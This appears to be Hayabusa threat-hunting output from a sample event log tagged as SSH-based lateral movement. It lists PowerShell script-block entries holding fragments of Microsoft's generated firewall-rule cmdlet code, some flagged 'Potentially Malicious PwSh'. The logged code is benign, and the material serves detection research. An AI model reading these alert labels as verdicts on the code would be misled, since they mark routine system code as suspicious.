[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { 
[object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParam,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
